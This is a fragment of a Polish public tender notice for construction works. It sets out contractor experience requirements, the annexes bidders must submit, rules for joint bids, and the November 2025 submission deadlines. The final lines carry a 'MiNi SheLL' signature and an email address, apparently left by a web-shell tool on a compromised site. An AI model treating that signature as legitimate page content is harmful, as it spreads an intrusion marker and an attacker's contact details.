sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty <br/>o wartości minimum 250 000 zł brutto,<br/><br/>Wykonawca, który ubiegał będzie się o zamówienia na wszystkie części powyższy warunek może wykazać przez wykazanie, iż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał jedną robotę budowlaną odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości 500 000 zł brutto, lub dwie roboty budowlane odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia każda <br/>z nich o wartości minimum 250 000 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">załączniknr 1 do SWZ – Wzór oferty.<br/>2. Załącznik nr 2a i 2 b do SWZ – Oświadczenie Wykonawcy o w zakresie podstaw wykluczenia z postępowania.<br/>3. Załącznik nr 3 do SWZ – Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p.<br/>w zakresie podstaw wykluczenia z postępowania.<br/>4. Załącznik nr 4 do SWZ – Wykaz osób.<br/>5. Załącznik nr 5 do SWZ – Wykaz robót.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Załącznik nr 2a i 2 b do<br/>SWZ – Oświadczenie Wykonawcy o w zakresie podstaw wykluczenia z postępowania.<br/>2. Załącznik nr 3 do SWZ – Oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 p.z.p.<br/>w zakresie podstaw</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3. Wspólne ubieganie się wykonawców o udzielenie zamówienia:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku, o którym mowa wyżej, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/>3) przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/ pełnomocnictwo do występowania w imieniu tej spółki<br/>wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia- został przewidziany w zał. nr 6 do SWZ wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-06 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com